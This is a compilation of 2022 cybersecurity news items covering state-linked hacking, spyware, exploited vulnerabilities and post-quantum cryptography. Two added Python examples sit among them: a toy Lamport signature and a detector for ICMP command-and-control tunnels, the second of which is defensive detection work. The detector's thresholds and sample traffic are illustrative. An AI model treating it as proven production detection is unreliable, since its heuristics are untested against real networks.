TrickBot Gang Shifted its Focus on "Systematically" Targeting Ukraine
8.7.22 BigBrothers Thehackernews
In what's being described as an "unprecedented" twist, the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.
The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter.
Tracked under the names ITG23, Gold Blackburn, and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year.
But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications.
"ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection," IBM Security X-Force analyst Ole Villadsen said in a technical report.
A noticeable shift in the campaigns involves the use of never-before-seen Microsoft Excel downloaders and the deployment of CobaltStrike, Meterpreter, and AnchorMail as first-stage payloads. The attacks are said to have commenced in mid-April 2022.
Interestingly, the threat actor leveraged the specter of nuclear war in its email ruse to spread the AnchorMail implant, a tactic that would be repeated by the Russian nation-state group tracked as APT28 two months later to spread data-stealing malware in Ukraine.
What's more, the Cobalt Strike sample deployed as part of a May 2022 campaign utilized a new crypter dubbed Forest to evade detection. Forest has also been used in conjunction with the Bumblebee malware, lending credence to theories that the loader is being operated by the TrickBot gang.
"Ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year," Villadsen noted. "These campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups."
The development comes as Ukrainian media outlets have been targeted with phishing messages containing malware-laced documents that exploit the Follina vulnerability to drop the DarkCrystal RAT on compromised systems.
The Computer Emergency Response Team of Ukraine (CERT-UA) has also warned of intrusions conducted by a group called UAC-0056 that involves striking state organizations with staffing-themed lures to drop Cobalt Strike Beacons on the hosts.
The agency, last month, further pointed out the use of Royal Road RTF weaponizer by a China-based actor codenamed the Tonto Team (aka Karma Panda) to target scientific and technical enterprises and state bodies located in Russia with the Bisonal malware.
Attributing these attacks with medium confidence to the advanced persistent threat (APT) group, SentinelOne said the findings demonstrate "a continued effort" on the part of the Chinese intelligence apparatus to target a wide range of Russian-linked organizations.
NIST Announces First Four Quantum-Resistant Cryptographic Algorithms
6.7.22 BigBrothers Thehackernews
The U.S. Department of Commerce's National Institute of Standards and Technology (NIST) has chosen the first set of quantum-resistant encryption algorithms that are designed to "withstand the assault of a future quantum computer."
The post-quantum cryptography (PQC) technologies include the CRYSTALS-Kyber algorithm for general encryption, and CRYSTALS-Dilithium, FALCON, and SPHINCS+ for digital signatures.
"Three of the selected algorithms are based on a family of math problems called structured lattices, while SPHINCS+ uses hash functions," NIST, which kicked off the standardization process in January 2017, said in a statement.
Cryptography, which underpins the security of information in modern computer networks, derives its strength from the difficulty of solving certain mathematical problems, e.g., factoring large composite integers, on traditional computers.
Quantum computers, should they mature enough, would severely undermine the current public-key algorithms: finding the right key to decode a message, which could take, say, trillions of years on a conventional computer, could take merely days or hours, rendering those algorithms susceptible to brute-force attacks.
"If large-scale quantum computers are ever built, they will be able to break many of the public-key cryptosystems currently in use," the agency said. "This would seriously compromise the confidentiality and integrity of digital communications on the internet and elsewhere."
Complicating matters further is a critical threat called "hack now, decrypt later" wherein cyber adversaries harvest sensitive encrypted data sent today in hopes of breaking it in the future when quantum computing becomes available.
The four quantum-resistant algorithms chosen by NIST are said to rely on mathematical problems that are hard to solve on both classical and quantum computers, thereby securing data against cryptanalytic attacks.
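As an added illustration of the hash-function-based approach NIST mentions for SPHINCS+ (example code written for this page, not NIST's or the article's; SPHINCS+ itself is a far more elaborate many-time scheme), the toy Lamport one-time signature below rests solely on the preimage resistance of SHA-256, with no factoring or discrete-logarithm assumption for a quantum computer to attack. The seed-derived key generation is an assumption made for reproducibility only; real keys must come from the operating system's random source.

```python
"""Toy Lamport one-time signature: security rests only on the preimage
resistance of a hash function (SHA-256 here), with no number theory.
Added example, not NIST's or the article's code. Seeded key generation is
an assumption for reproducibility; use os.urandom in real code.
"""
import hashlib
import os

N_BITS = 256  # one secret pair per bit of the SHA-256 message digest


def H(data):
    return hashlib.sha256(data).digest()


def keygen(seed=None):
    """Secret key: 256 pairs of 32-byte values. Public key: their hashes.
    Pass no seed in real use so the values come from os.urandom."""
    if seed is None:
        seed = os.urandom(32)
    sk = [(H(seed + b"\x00" + i.to_bytes(2, "big")),
           H(seed + b"\x01" + i.to_bytes(2, "big")))
          for i in range(N_BITS)]
    pk = [(H(x0), H(x1)) for x0, x1 in sk]
    return sk, pk


def message_bits(msg):
    """The 256 bits of SHA-256(msg), most significant bit first."""
    digest = H(msg)
    return [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(N_BITS)]


def sign(sk, msg):
    """Reveal, for each digest bit, the secret value on that side of the pair."""
    return [sk[i][bit] for i, bit in enumerate(message_bits(msg))]


def verify(pk, msg, sig):
    """Hash each revealed value and compare it with the published half of the pair.
    (Plain == comparison is fine for a toy; production code would compare in constant time.)"""
    if len(sig) != N_BITS:
        return False
    bits = message_bits(msg)
    return all(H(sig[i]) == pk[i][bits[i]] for i in range(N_BITS))


def revealed_secret_count(sigs):
    """Distinct secret values exposed by a set of signatures under one key.
    One signature reveals 256 of the 512 secrets; each further message reveals
    more, which is why a Lamport key must never sign twice."""
    return len({value for sig in sigs for value in sig})


if __name__ == "__main__":
    sk, pk = keygen(b"constructed-seed-do-not-use")
    msg = b"transfer 10 BTC to alice"
    sig = sign(sk, msg)
    print("valid:", verify(pk, msg, sig))
    print("tampered message:", verify(pk, b"transfer 10 BTC to mallory", sig))
    print("secrets revealed by one signature:", revealed_secret_count([sig]))
    print("after signing a second message:",
          revealed_secret_count([sig, sign(sk, b"another message")]))
```

The public key is 16 KiB and the signature 8 KiB, which is why practical hash-based schemes add Merkle trees and few-time signatures on top; the security argument, however, is the same one shown here.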
The agency also plans to include four more algorithms before finalizing the post-quantum cryptographic standard, a process that's expected to be completed in about two years.
That said, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with NIST, is "strongly" recommending that organizations start preparing for the transition by following the Post-Quantum Cryptography Roadmap.
Pro-China Group Uses Dragonbridge Campaign to Target Rare Earth Mining Companies
6.7.22 BigBrothers Thehackernews
A pro-China influence campaign singled out rare earth mining companies in Australia, Canada, and the U.S. with negative messaging in an unsuccessful attempt to manipulate public discourse to China's benefit.
Targeted firms included Australia's Lynas Rare Earths Ltd, Canada's Appia Rare Earths & Uranium Corp, and the American company USA Rare Earth, threat intelligence firm Mandiant said in a report last week, calling the digital campaign Dragonbridge.
"It targeted an industry of strategic significance to the PRC, including specifically three commercial entities challenging the PRC's global market dominance in that industry," Mandiant noted.
The goal, the company noted, was to instigate environmental protests against the companies and propagate counter-narratives in response to potential or planned rare earths production activities involving the targets.
This comprised a network of thousands of inauthentic accounts across numerous social media platforms and forums that worked in tandem to disseminate content that seemingly raised concerns over alleged environmental, health, and labor issues related to the operations of the three firms.
Some of the bogus accounts masqueraded as Texas citizens in a public 1,200-member Facebook group called "STOP LYNAS! NO to Lynas Exporting and Creating Another Toxic Legacy," alleging the mining firm risks exposing local populations to radioactive contamination and poisoning.
A majority of the posts were primarily in English, with limited content written in Chinese and Malay. That said, the activity is said to have received only limited engagement in the form of likes and comments from other accounts.
This is not the first time the actor has been linked to disinformation operations conducted in support of the People's Republic of China (PRC). While earlier activities in June 2019 were primarily focused on discrediting pro-democracy protests in Hong Kong, they have since sought to physically mobilize protestors in the U.S. in response to the COVID-19 pandemic.
"DRAGONBRIDGE's targeting of additional rare earths mining companies underscores the campaign's ability to monitor developments and respond accordingly," the researchers said.
U.S. FCC Commissioner Asks Apple and Google to Remove TikTok from App Stores
1.7.22 BigBrothers Thehackernews
One of the commissioners of the U.S. Federal Communications Commission (FCC) has renewed calls asking for Apple and Google to boot the popular video-sharing platform TikTok from their app stores citing "its pattern of surreptitious data practices."
"It is clear that TikTok poses an unacceptable national security risk due to its extensive data harvesting being combined with Beijing's apparently unchecked access to that sensitive data," Brendan Carr, a Republican member of the FCC, wrote in a letter to Apple and Google's chief executives.
TikTok, in September 2021, disclosed that there are one billion people who use its app every month, making it one of the largest social media platforms after Facebook, YouTube, WhatsApp, Instagram, and WeChat.
Carr further emphasized that the short-form video service is far from just an app for sharing funny videos or memes, calling out its features as "sheep's clothing" intended to mask its core function as a "sophisticated surveillance tool" for amassing users' personal information.
The letter also references a litany of controversies that TikTok found itself in over the years, including skirting Android safeguards to track users online, accessing iOS clipboard information, and settling a class-action lawsuit for $92 million over allegations that it captured biometric and personal data from users in the U.S. without prior consent.
TikTok, which is owned by Beijing-based ByteDance and has denied ever sharing user data with the Chinese government, is back in the spotlight close on the heels of revelations from BuzzFeed News that U.S. users' data had been repeatedly accessed by employees based in China between September 2021 and January 2022 despite its assurances to the contrary.
"Everything is seen in China," a member of TikTok's Trust and Safety department was quoted as saying in a September 2021 meeting, while in another meeting held that month, a director referred to a Beijing-based engineer as a "Master Admin" who "has access to everything."
Last year, CNBC, citing former employees, similarly alleged that the social media app's Chinese parent company had access to TikTok's U.S. user data and that it's closely involved in the decision-making and product development.
In a statement shared with the business news publication, TikTok said engineers in locations outside of the U.S., including China, can be permitted access to U.S. user data on an "as-needed basis" under strict access controls.
TikTok has since announced that it's "changed the default storage location of U.S. user data" and that it's routing all information from its users in the country through infrastructure controlled by Oracle. However, Carr noted these efforts do not address the core concerns of data access.
"TikTok has long claimed that its U.S. user data has been stored on servers in the U.S. and yet those representations provided no protection against the data being accessed from Beijing," Carr said. "Indeed, TikTok's statement that '100% of U.S. user traffic is being routed to Oracle' says nothing about where that data can be accessed from."
It's worth noting that several U.S. military branches have already banned its members from using TikTok on government-issued devices due to possible security risks. In June 2020, the Indian government moved to block the app on similar grounds.
North Korean Hackers Suspected to be Behind $100M Horizon Bridge Hack
1.7.22 BigBrothers Thehackernews
The notorious North Korea-backed hacking collective Lazarus Group is suspected to be behind the recent $100 million altcoin theft from Harmony Horizon Bridge, citing similarities to the Ronin bridge attack in March 2022.
The finding comes as Harmony confirmed that its Horizon Bridge, a platform that allows users to move cryptocurrency across different blockchains, had been breached last week.
The incident involved the exploiter carrying out multiple transactions on June 23 that extracted tokens stored in the bridge and subsequently making away with about $100 million in cryptocurrency.
"The stolen crypto assets included Ether (ETH), Tether (USDT), Wrapped Bitcoin (WBTC) and BNB," blockchain analytics company Elliptic said in a new report. "The thief immediately used Uniswap, a decentralized exchange (DEX), to convert much of these assets into a total of 85,837 ETH."
Days later, on June 27, the culprit is said to have begun moving funds amounting to $39 million through the Tornado Cash mixer service in an attempt to obfuscate the ill-gotten gains and make it difficult to trace the transaction trail back to the original theft.
Elliptic, which was able to "demix" the transactions, said it was in a position to further track the stolen funds funneled through the service to a number of new Ethereum wallets.
The company's attribution to the Lazarus Group stems from the threat actor's history of carrying out cryptocurrency thefts, including those targeting cross-chain bridges earlier this year, and the manner in which the funds were stolen and subsequently laundered.
"The theft was perpetrated by compromising the cryptographic keys of a multi-signature wallet likely through a social engineering attack on Harmony team members," it said. "Such techniques have frequently been used by the Lazarus Group."
"The relatively short periods during which the stolen funds stop being moved out of Tornado Cash are consistent with [Asia-Pacific] nighttime hours," Elliptic added. "Although no single factor proves the involvement of Lazarus, in combination they suggest the group's involvement."
Harmony has since notified all cryptocurrency exchanges and involved law enforcement and blockchain forensic firms to help in the recovery of stolen assets. It's also offering "one final opportunity" for the cyber thieves to send the funds back with anonymity and "retain $10 million and return the remaining amount" by July 4, 2022, 11 p.m. GMT.
On top of that, it has promised a $10 million reward for any information that leads to the return of plundered virtual currencies.
The Horizon Bridge digital heist also arrives against the backdrop of a "crypto winter" that has witnessed a steep decline in cryptocurrency markets, sending prices of Bitcoin down below $20,000 and potentially risking a key source of income for the sanctions-hit North Korea.
In a related development, Sky Mavis, developers of the popular non-fungible token (NFT) video game Axie Infinity, announced this week the official restart of the Ronin Bridge following three different audits.
What's more, the European Parliament and Council reached a landmark agreement on Wednesday to force crypto platforms to provide identifying information on the originators and the beneficiaries in a bid to enforce transparency of crypto asset transfers.
"This is what payment service providers currently do for wire transfers," the Council said in a press statement. "This will ensure traceability of crypto asset transfers in order to be able to better identify possible suspicious transactions and block them."
CISA Warns of Active Exploitation of 'PwnKit' Linux Vulnerability in the Wild
29.6.22 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week moved to add a Linux vulnerability dubbed PwnKit to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation.
The issue, tracked as CVE-2021-4034 (CVSS score: 7.8), came to light in January 2022 and concerns a case of local privilege escalation in polkit's pkexec utility, which allows an authorized user to execute commands as another user.
Polkit (formerly called PolicyKit) is a toolkit for controlling system-wide privileges in Unix-like operating systems, and provides a mechanism for non-privileged processes to communicate with privileged processes.
Successful exploitation of the flaw could induce pkexec to execute arbitrary code, granting an unprivileged attacker administrative rights on the target machine and compromising the host.
It's not immediately clear how the vulnerability is being weaponized in the wild, nor is there any information on the identity of the threat actor that may be exploiting it.
Also included in the catalog is CVE-2021-30533, a security shortcoming in Chromium-based web browsers that was leveraged by a malvertising threat actor codenamed Yosec to deliver dangerous payloads last year.
Furthermore, the agency added the newly disclosed Mitel VoIP zero-day (CVE-2022-29499) as well as five Apple iOS vulnerabilities (CVE-2018-4344, CVE-2019-8605, CVE-2020-9907, CVE-2020-3837, and CVE-2021-30983) that were recently uncovered as having been abused by Italian spyware vendor RCS Lab.
To mitigate any potential risk of exposure to cyberattacks, it's recommended that organizations prioritize timely remediation of the issues. Federal Civilian Executive Branch Agencies, however, are required to patch the flaws by July 18, 2022.
Italy Data Protection Authority Warns Websites Against Use of Google Analytics
27.6.22 BigBrothers Thehackernews
Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U. data protection regulations.
The Garante per la Protezione dei Dati Personali, in a press release published last week, called out a local web publisher for using the widely used analytics tool in a manner that allowed key bits of users' personal data to be illegally transferred to the U.S. without necessary safeguards.
This includes interactions of users with the websites, the individual pages visited, IP addresses of the devices used to access the websites, browser specifics, details related to the device's operating system, screen resolution, and the selected language, as well as the date and time of the visits.
The Italian supervisory authority (SA) said that it arrived at this conclusion following a "complex fact-finding exercise" it commenced in collaboration with other E.U. data protection authorities.
The agency said the transfer of personal information violates the data protection legislation because the U.S. is a "country without an adequate level of protection," while highlighting the "possibility for U.S. government authorities and intelligence agencies to access personal data transferred without due guarantees."
The website in question, Caffeina Media SRL, has been given a period of 90 days to move away from Google Analytics to ensure compliance with GDPR. In addition, the Garante drew webmasters' attention to the unlawfulness of data transfers to the U.S. stemming from the use of Google Analytics, recommending that site owners switch to alternative audience measurement tools that meet GDPR requirements.
"Upon expiry of the 90-day deadline set out in its decision, the Italian SA will check that the data transfers at issue are compliant with the E.U. GDPR, including by way of ad-hoc inspections," it stated.
Earlier this month, the French data protection watchdog, the CNIL, issued updated guidance over the use of Google Analytics, reiterating the practice as illegal under the General Data Protection Regulation (GDPR) laws and giving affected organizations a period of one month to comply.
"The implementation of data encryption by Google has proven to be an insufficient technical measure because Google LLC encrypts the data itself and has the obligation to grant access or provide the imported data which is in its possession, including the encryption keys necessary to make the data intelligible," the regulator said.
Google told TechCrunch that it's reviewing the latest decision. In January 2022, the tech giant stressed that Google Analytics "does not track people or profile people across the internet" and that organizations can control the data gathered through the service.
The Mountain View-based firm, which hosts all the data collected through the analytics platform in the U.S., also said it offers an IP address masking function that, when enabled, anonymizes the information in local servers before it's transferred to any servers outside the E.U. It's worth noting that this feature is enabled by default with Google Analytics 4.
NSO Confirms Pegasus Spyware Used by at least 5 European Countries
23.6.22 BigBrothers Thehackernews
The beleaguered Israeli surveillanceware vendor NSO Group this week admitted to the European Union lawmakers that its Pegasus tool was used by at least five countries in the region.
"We're trying to do the right thing and that's more than other companies working in the industry," Chaim Gelfand, the company's general counsel and chief compliance officer, said, according to a report from Politico.
Acknowledging that it had "made mistakes," the company also stressed the need for an international standard to regulate government use of spyware.
The disclosure comes as a special inquiry committee was launched in April 2022 to investigate alleged breaches of E.U. law following revelations that the company's Pegasus spyware is being used to snoop on phones belonging to politicians, diplomats, and civil society members.
"The committee is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers," the European Parliament said in March 2022.
Earlier this February, the European Data Protection Supervisor (EDPS) called for a ban on the development and the use of commercial spyware in the region, stating that the technology's "unprecedented level of intrusiveness" could endanger users' right to privacy.
Pegasus, and its other counterparts like FinFisher and Cytrox, are designed to be stealthily installed on a smartphone by exploiting unknown vulnerabilities in software known as zero-days to seize remote control of the device and harvest sensitive data.
Infections are typically achieved by means of one-click attacks wherein targets are tricked into clicking on a link sent via messages on iMessage or WhatsApp, or alternatively using zero-click exploits that require no interaction.
Once installed, the spyware provides support for a broad range of capabilities that allows the operator to track the victim's whereabouts, eavesdrop on conversations, and exfiltrate messages from even encrypted apps like WhatsApp.
NSO Group, founded in 2010, has long maintained that it only supplies the software to government customers, who it says use it to tackle terrorism, drug trafficking, and serious crime, but evidence has shown widespread misuse of the software to keep tabs on political opponents, critics, activists, journalists, and lawyers across the world.
"The use of Pegasus does not require cooperation with telecommunication companies, and it can easily overcome encryption, SSL, proprietary protocols, and any hurdle introduced by the complex communications worldwide," the Council of Europe noted in an interim report.
"It provides remote, covert, and unlimited access to the target's mobile devices. This Modus Operandi of the Pegasus clearly reveals its capacity to be used for targeted as well as indiscriminate surveillance."
Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine
22.6.22 BigBrothers Thehackernews
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware.
Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism A Very Real Threat.rtf" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.
Follina (CVE-2022-30190, CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, 2022, as part of its Patch Tuesday updates.
According to an independent report published by Malwarebytes, CredoMap is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) divulged last month as having been deployed against users in Ukraine.
The malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.
"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence," Malwarebytes said. "The target, and the involvement of APT28 (a division of Russian military intelligence), suggests that the campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state."
It's not just APT28. CERT-UA has further warned of similar attacks mounted by Sandworm and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons onto targeted hosts.
The development comes as Ukraine continues to be a target for cyberattacks amidst the country's ongoing war with Russia, with Armageddon hackers also spotted distributing the GammaLoad.PS1_v2 malware in May 2022.
Chinese 'Gallium' Hackers Using New PingPull Malware in Cyberespionage Attacks
13.6.22 BigBrothers Thehackernews
A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa.
Called PingPull, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications, according to new research published by Palo Alto Networks Unit 42 today.
Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017.
Over the past year, however, the group is said to have expanded its victimology footprint to include financial institutions and government entities located in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.
PingPull, a Visual C++-based malware, provides a threat actor the ability to access a reverse shell and run arbitrary commands on a compromised host. This encompasses carrying out file operations, enumerating storage volumes, and timestomping files.
"PingPull samples that use ICMP for C2 communications issue ICMP Echo Request (ping) packets to the C2 server," the researchers detailed. "The C2 server will reply to these Echo requests with an Echo Reply packet to issue commands to the system."
Also identified are PingPull variants that rely on HTTPS and TCP instead of ICMP to communicate with their C2 server, as well as over 170 IP addresses associated with the group since late 2020.
It's not immediately clear how the targeted networks are breached, although the threat actor is known to exploit internet-exposed applications to gain an initial foothold and deploy a modified version of the China Chopper web shell to establish persistence.
"Gallium remains an active threat to telecommunications, finance and government organizations across Southeast Asia, Europe and Africa," the researchers noted.
"While the use of ICMP tunneling is not a new technique, PingPull uses ICMP to make it more difficult to detect its C2 communications, as few organizations implement inspection of ICMP traffic on their networks."
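The echo request/reply channel described above is exactly the kind of traffic that goes unexamined when ICMP is not inspected. The following is an added example, not Unit 42's tooling or anything from the article: it parses raw IPv4/ICMP packets and flags source hosts whose echo requests carry payloads that do not match a ping tool's filler pattern, vary in length from request to request, or look encrypted. The packet builder, the sample traffic, and every threshold are constructed assumptions for the demonstration.

```python
"""Spot ICMP echo traffic that behaves like a command channel rather than ping.

Standard ping tools send fixed-size echo requests whose payload follows a
predictable filler pattern; a tunnel carrying operator commands produces
payloads of varying length that follow no such pattern and often look
encrypted. This analyser parses raw IPv4/ICMP packets and scores each source
host on those properties. All thresholds are illustrative assumptions.
"""
import hashlib
import math
import struct
from collections import defaultdict

# Windows ping fills its 32-byte payload with this string (repeated for larger sizes).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def build_icmp_echo(src, dst, payload, ident=1, seq=1, icmp_type=8):
    """Fabricate a minimal IPv4+ICMP packet; used only to construct sample traffic."""
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0, src_b, dst_b)
    icmp_hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)  # checksum left zero
    return ip_hdr + icmp_hdr + payload


def parse_icmp(pkt):
    """Return (src, dst, icmp_type, payload) for an IPv4 ICMP packet, else None."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4 or pkt[9] != 1:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    icmp = pkt[ihl:]
    if len(icmp) < 8:
        return None
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    return src, dst, icmp[0], icmp[8:]


def looks_like_ping_payload(payload):
    """True if the payload matches a common ping tool's filler pattern."""
    n = len(payload)
    if n == 0:
        return True
    if payload == (WINDOWS_PING_PAYLOAD * (n // 32 + 1))[:n]:
        return True
    # iputils ping: a timestamp (8 or 16 bytes) followed by bytes equal to their own index.
    for ts_len in (8, 16):
        if n > ts_len and payload[ts_len:] == bytes(i & 0xFF for i in range(ts_len, n)):
            return True
    return False


def shannon_entropy(data):
    """Bits of entropy per byte; encrypted or compressed data approaches 8 for long inputs."""
    counts = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def analyse(packets, min_requests=5, entropy_threshold=5.0):
    """Return {source_ip: [reasons]} for hosts whose echo requests look like a tunnel."""
    stats = defaultdict(lambda: {"requests": 0, "nonstandard": 0, "sizes": set(), "entropy": []})
    for pkt in packets:
        parsed = parse_icmp(pkt)
        if parsed is None:
            continue
        src, _dst, icmp_type, payload = parsed
        if icmp_type != 8:  # only echo requests are scored here
            continue
        s = stats[src]
        s["requests"] += 1
        s["sizes"].add(len(payload))
        if not looks_like_ping_payload(payload):
            s["nonstandard"] += 1
            s["entropy"].append(shannon_entropy(payload))
    alerts = {}
    for src, s in stats.items():
        if s["requests"] < min_requests or s["nonstandard"] == 0:
            continue
        reasons = []
        if s["nonstandard"] / s["requests"] >= 0.5:
            reasons.append("payloads do not match any ping tool pattern")
        if len(s["sizes"]) > 1:
            reasons.append("variable payload length across requests")
        if max(s["entropy"]) >= entropy_threshold:
            reasons.append("high-entropy payload")
        if len(reasons) >= 2:  # require two independent signals to cut false positives
            alerts[src] = reasons
    return alerts


def sample_packets():
    """Constructed traffic: a Linux host and a Windows host pinging the gateway, plus a
    third host sending hash-derived (encrypted-looking) chunks of varying size."""
    pkts = []
    linux_payload = bytes(8) + bytes(i & 0xFF for i in range(8, 56))
    for seq in range(1, 7):
        pkts.append(build_icmp_echo("10.0.0.5", "10.0.0.1", linux_payload, seq=seq))
        pkts.append(build_icmp_echo("10.0.0.7", "10.0.0.1", WINDOWS_PING_PAYLOAD, seq=seq))
    for seq in range(8):
        chunk = b"".join(hashlib.sha256(b"constructed-chunk-%d-%d" % (seq, k)).digest()
                         for k in range(1 + seq % 3))
        pkts.append(build_icmp_echo("10.0.0.23", "198.51.100.9", chunk, seq=seq))
    pkts.append(b"\x45\x00\x00\x28" + bytes(5) + b"\x06" + bytes(30))  # a TCP packet, ignored
    return pkts


if __name__ == "__main__":
    for host, reasons in analyse(sample_packets()).items():
        print(host, "->", "; ".join(reasons))
```

In a real deployment the same scoring would run over packets pulled from a capture or a sensor, and the request-rate per host would be a fourth signal worth adding; the point is that ICMP needs the same content- and behaviour-based inspection most networks already apply to DNS and HTTP.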
U.S. Agencies Warn About Chinese Hackers Targeting Telecoms and Network Service Providers
8.6.22 BigBrothers Thehackernews
U.S. cybersecurity and intelligence agencies have warned about China-based state-sponsored cyber actors leveraging network vulnerabilities to exploit public and private sector organizations since at least 2020.
The widespread intrusion campaigns aim to exploit publicly identified security flaws in network devices such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices with the goal of gaining deeper access to victim networks.
In addition, the actors used these compromised devices to route command-and-control (C2) traffic to break into other targets at scale, the U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) said in a joint advisory.
The perpetrators, besides shifting their tactics in response to public disclosures, are known to employ a mix of open-source and custom tools for reconnaissance and vulnerability scanning as well as to obscure and blend their activity.
The attacks themselves are facilitated by accessing compromised servers, which the agencies called hop points, from China-based IP addresses, using them to host C2 domains, email accounts, and communicate with the target networks.
"Cyber actors use these hop points as an obfuscation technique when interacting with victim networks," the agencies noted, detailing the adversary's pattern of weaponizing flaws in telecommunications organizations and network service providers.
Upon gaining a foothold into the network via an unpatched internet-facing asset, the actors have been observed obtaining credentials for user and administrative accounts, followed by running router commands to "surreptitiously route, capture, and exfiltrate traffic out of the network to actor-controlled infrastructure."
Finally, the attackers also modified or removed local log files to erase evidence of their activity, further concealing their presence and evading detection.
The agencies did not single out a specific threat actor, but noted that the findings reflect Chinese state-sponsored groups' history of aggressively striking critical infrastructure to steal sensitive data, emerging key technologies, intellectual property, and personally identifiable information.
The disclosure also arrives less than a month after the cybersecurity authorities revealed the most routinely exploited initial access vectors to breach targets, some of which include misconfigured servers, weak password controls, unpatched software, and failure to block phishing attempts.
"Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program," the agencies said.
FBI Seizes 'SSNDOB' ID Theft Service for Selling Personal Info of 24 Million People
8.6.22 BigBrothers Thehackernews
An illicit online marketplace known as SSNDOB was taken down in an operation led by U.S. law enforcement agencies, the Department of Justice (DoJ) announced Tuesday.
SSNDOB trafficked in personal information such as names, dates of birth, credit card numbers, and Social Security numbers of about 24 million individuals in the U.S., generating its operators $19 million in sales revenue.
The action saw the seizure of several domains associated with the marketplace (ssndob.ws, ssndob.vip, ssndob.club, and blackjob.biz) in cooperation with authorities from Cyprus and Latvia.
According to blockchain analytics firm Chainalysis, SSNDOB's Bitcoin payment processing system has received nearly $22 million worth of Bitcoin across over 100,000 transactions since April 2015.
Furthermore, bitcoin transfers to the tune of more than $100,000 have been unearthed between SSNDOB and Joker's Stash, another darknet market that specialized in stolen credit card information and voluntarily closed shop in January 2021, indicating a close relationship between the two criminal storefronts.
"The SSNDOB administrators created advertisements on dark web criminal forums for the Marketplace's services, provided customer support functions, and regularly monitored the activities of the sites, including monitoring when purchasers deposited money into their accounts," the DoJ said in a statement.
Additionally, the cybercriminal actors are said to have employed tactics to conceal their true identities, including using anonymous online profiles, maintaining servers in different countries, and requiring potential buyers to use cryptocurrencies.
"Identity theft can have a devastating impact on a victim's long-term emotional and financial health," said Darrell Waldon, special agent in charge of IRS-CI Washington, D.C. Field Office. "Taking down the SSNDOB website disrupted ID theft criminals and helped millions of Americans whose personal information was compromised."
The takedown marks the continued ramping up of efforts on the part of law enforcement agencies across the world to disrupt malicious cyber activity.
Last week, Europol publicized the shutdown of the FluBot Android banking trojan, while the Justice Department said it seized three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire.
Earlier this year, the Federal Bureau of Investigation (FBI) also neutralized a modular botnet dubbed Cyclops Blink as well as dismantled RaidForums, a hacking forum notorious for selling access to hacked personal information belonging to users.
In a related development, the U.S. Treasury Department also sanctioned Hydra after German law enforcement authorities disrupted the world's largest and longest-running dark web marketplace in April 2022.
Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies
3.6.22 BigBrothers Thehackernews
Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.
In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by the actor and notified affected organizations.
